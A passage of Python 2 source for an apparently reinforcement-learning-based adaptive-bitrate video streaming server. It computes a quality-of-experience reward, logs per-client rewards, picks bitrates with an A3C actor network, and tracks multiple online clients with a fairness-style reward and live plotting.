reward = VIDEO_BIT_RATE[post_data['lastquality']] / M_IN_K \
- REBUF_PENALTY * rebuffer_time / M_IN_K \
- SMOOTH_PENALTY * np.abs(VIDEO_BIT_RATE[post_data['lastquality']] -
self.input_dict['last_bit_rate']) / M_IN_K
# --log reward--
# log_bit_rate = np.log(VIDEO_BIT_RATE[post_data['lastquality']] / float(VIDEO_BIT_RATE[0]))
# log_last_bit_rate = np.log(self.input_dict['last_bit_rate'] / float(VIDEO_BIT_RATE[0]))
# reward = log_bit_rate \
# - 4.3 * rebuffer_time / M_IN_K \
# - SMOOTH_PENALTY * np.abs(log_bit_rate - log_last_bit_rate)
# --hd reward--
# reward = BITRATE_REWARD[post_data['lastquality']] \
# - 8 * rebuffer_time / M_IN_K - np.abs(BITRATE_REWARD[post_data['lastquality']] - BITRATE_REWARD_MAP[self.input_dict['last_bit_rate']])
#########save reward to file##########
f=open("ip_time_rewards.json",'r')
fcntl.flock(f,fcntl.LOCK_EX)
try:
load_rewards=json.load(f)
except:
load_rewards={}
for ip in load_rewards.keys():#not necessary here, can move to init procedure
if int(load_rewards[ip].keys()[0])<begin_time:
load_rewards.pop(ip)
fcntl.flock(f,fcntl.LOCK_UN)
f.close()
if self.client_address[0] not in load_rewards.keys():
load_rewards[self.client_address[0]]={str(int(time.time())):reward}
else:
load_rewards[self.client_address[0]].update({str(int(time.time())):reward})
print(load_rewards)
f=open("ip_time_rewards.json",'w')
fcntl.flock(f,fcntl.LOCK_EX)
json.dump(load_rewards,f)
fcntl.flock(f,fcntl.LOCK_UN)
f.close()
#######################################
self.input_dict['last_bit_rate'] = VIDEO_BIT_RATE[post_data['lastquality']]
self.input_dict['last_total_rebuf'] = post_data['RebufferTime']
# retrieve previous state
if len(self.s_batch) == 0:
state = [np.zeros((S_INFO, S_LEN))]
else:
state = np.array(self.s_batch[-1], copy=True)
# compute bandwidth measurement
video_chunk_fetch_time = post_data['lastChunkFinishTime'] - post_data['lastChunkStartTime']
video_chunk_size = post_data['lastChunkSize']
# compute number of video chunks left
video_chunk_remain = TOTAL_VIDEO_CHUNKS - self.input_dict['video_chunk_coount']
self.input_dict['video_chunk_coount'] += 1
# dequeue history record
state = np.roll(state, -1, axis=1)
next_video_chunk_sizes = []
for i in xrange(A_DIM):
next_video_chunk_sizes.append(get_chunk_size(i, self.input_dict['video_chunk_coount']))
# this should be S_INFO number of terms
try:
state[0, -1] = VIDEO_BIT_RATE[post_data['lastquality']] / float(np.max(VIDEO_BIT_RATE))
state[1, -1] = post_data['buffer'] / BUFFER_NORM_FACTOR
state[2, -1] = float(video_chunk_size) / float(video_chunk_fetch_time) / M_IN_K # kilo byte / ms
state[3, -1] = float(video_chunk_fetch_time) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec
state[4, :A_DIM] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K # mega byte
state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)
except ZeroDivisionError:
# this should occur VERY rarely (1 out of 3000), should be a dash issue
# in this case we ignore the observation and roll back to an eariler one
if len(self.s_batch) == 0:
state = [np.zeros((S_INFO, S_LEN))]
else:
state = np.array(self.s_batch[-1], copy=True)
# log wall_time, bit_rate, buffer_size, rebuffer_time, video_chunk_size, download_time, reward
self.log_file.write(str(time.time()) + '\t' +
str(VIDEO_BIT_RATE[post_data['lastquality']]) + '\t' +
str(post_data['buffer']) + '\t' +
str(rebuffer_time / M_IN_K) + '\t' +
str(video_chunk_size) + '\t' +
str(video_chunk_fetch_time) + '\t' +
str(reward) + '\n')
self.log_file.flush()
action_prob = self.actor.predict(np.reshape(state, (1, S_INFO, S_LEN)))
action_cumsum = np.cumsum(action_prob)
bit_rate = (action_cumsum > np.random.randint(1, RAND_RANGE) / float(RAND_RANGE)).argmax()
# Note: we need to discretize the probability into 1/RAND_RANGE steps,
# because there is an intrinsic discrepancy in passing single state and batch states
# send data to html side
send_data = str(bit_rate)
end_of_video = False
if ( post_data['lastRequest'] == TOTAL_VIDEO_CHUNKS ):
send_data = "REFRESH"
end_of_video = True
self.input_dict['last_total_rebuf'] = 0
self.input_dict['last_bit_rate'] = DEFAULT_QUALITY
self.input_dict['video_chunk_coount'] = 0
self.log_file.write('\n') # so that in the log we know where video ends
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(send_data))
self.send_header('Access-Control-Allow-Origin', "*")
self.end_headers()
self.wfile.write(send_data)
# record [state, action, reward]
# put it here after training, notice there is a shift in reward storage
if end_of_video:
self.s_batch = [np.zeros((S_INFO, S_LEN))]
else:
self.s_batch.append(state)
def do_GET(self):
print >> sys.stderr, 'GOT REQ'
self.send_response(200)
#self.send_header('Cache-Control', 'Cache-Control: no-cache, no-store, must-revalidate max-age=0')
self.send_header('Cache-Control', 'max-age=3000')
self.send_header('Content-Length', 20)
self.end_headers()
self.wfile.write("console.log('here');")
def log_message(self, format, *args):
return
return Request_Handler
###### onlineCheck #######
def onlineCheck(Que1_,Que2_,QueOL):
while True:
#print('updateQue')
updateQue(Que1_,Que2_,QueOL)
global Dict1,Dict2,MultiClientState,begin_time
f=open("OLlist.json",'r')
fcntl.flock(f,fcntl.LOCK_EX)
try:
MultiClientState=json.load(f)
print(MultiClientState)
except:
MultiClientState={}
for ip in MultiClientState.keys():
if int(time.time())-MultiClientState[ip][0]-10>0:
MultiClientState.pop(ip)
tmp={}
try:
tmp[QueOL[:][0]]=[time.time(),max(max(Dict2.values()))]
except:
pass
MultiClientState.update(tmp)
print(MultiClientState)
fcntl.flock(f,fcntl.LOCK_UN)
f.close()
f=open("OLlist.json",'w')
fcntl.flock(f,fcntl.LOCK_EX)
json.dump(MultiClientState,f)
fcntl.flock(f,fcntl.LOCK_UN)
f.close()
plot(Dict1,Dict2)
print(multi_agent_reward(Dict2))######### print when onlinecheck or when do_post
time.sleep(5)
def updateQue(Que1_,Que2_,QueOL):
#print('_Que1',Que1_[:])
#print('_Que2',Que2_[:])
#print('_QueOnline',QueOL[:])
QueOL[:]=Que1_[:]+[item for item in Que2_[:] if item not in Que1_[:]]
Que2_[:]=copy.copy(Que1_[:])
Que1_[:]=[]
#print('Que1_',Que1_[:])
#print('Que2_',Que2_[:])
print('QueOnline_',QueOL[:])
##########################
########## plot ##########
def plot(Dictt,Dictq):
color_ = ['black', 'red', 'blue', 'green', 'gold', 'm']
c=0
for k in Dictt.keys():
plt.plot(Dictt[k], Dictq[k], color=color_[c%6])
#print(Dictt[k],Dictq[k])
plt.scatter(Dictt[k], Dictq[k], color=color_[c%6])
plt.title("RL_1")
plt.axis([-1,max(Dictt[k])*1.1,0,6])
c=c+1
plt.pause(1)
##########################
### multi agent reward ###
def multi_agent_reward(Dictq):
#VIDEO_BIT_RATE
total_reward=0
miu=0
sigma=0
lastQ=[]
for k in Dictq.keys():
lastQ.append((Dictq[k])[-1])
miu=np.mean(lastQ)
sigma=np.std(lastQ)
total_reward=miu-sigma
return total_reward
##########################
def run(server_class=HTTPServer, port=8334, log_file_path=LOG_FILE):
np.random.seed(RANDOM_SEED)
assert len(VIDEO_BIT_RATE) == A_DIM
if not os.path.exists(SUMMARY_DIR):
os.makedirs(SUMMARY_DIR)
with tf.Session() as sess, open(log_file_path, 'wb') as log_file:
actor = a3c.ActorNetwork(sess,
state_dim=[S_INFO, S_LEN], action_dim=A_DIM,
learning_rate=ACTOR_LR_RATE)
critic = a3c.CriticNetwork(sess,
state_dim=[S_INFO, S_LEN],
learning_rate=CRITIC_LR_RATE)
sess.run(tf.initialize_all_variables())
saver = tf.train.Saver() # save neural net parameters
# restore neural net parameters
nn_model = NN_MODEL
if nn_model is not None: # nn_model is the path to file
saver.restore(sess, nn_model)
print("Model restored.")
init_action = np.zeros(A_DIM)
init_action[DEFAULT_QUALITY] = 1
s_batch = [np.zeros((S_INFO, S_LEN))]
a_batch = [init_action]
r_batch = []
train_counter = 0
last_bit_rate = DEFAULT_QUALITY
last_total_rebuf = 0
# need this storage, because observation only contains total rebuffering time
# we compute the difference to get
video_chunk_count = 0
input_dict = {'sess': sess, 'log_file': log_file,
'actor': actor, 'critic': critic,
'saver': saver, 'train_counter': train_counter,
'last_bit_rate': last_bit_rate,
'last_total_rebuf': last_total_rebuf,
'video_chunk_coount': video_chunk_count,
's_batch': s_batch, 'a_batch': a_batch, 'r_batch': r_batch}
# interface to abr_rl server
handler_class = make_request_handler(input_dict=input_dict)
server_address = ('', port)
#httpd = server_class(server_address, handler_class)
httpd = my_socketserver(server_address, handler_class)
print 'Listening on port ' + str(port)
####### onlineCheck ######
global Que1
global Que2
global QueOnline
p = multiprocessing.Process(target=onlineCheck,args=(Que1,Que2,QueOnline))
p.start()
p.deamon = True
##########################
httpd.serve_forever()
def main():
if len(sys.argv) == 2:
trace_file = sys.argv[1]
run(log_file_path=LOG_FILE + '_RL_' + trace_file)
else:
run()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print "Keyboard interrupted."
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.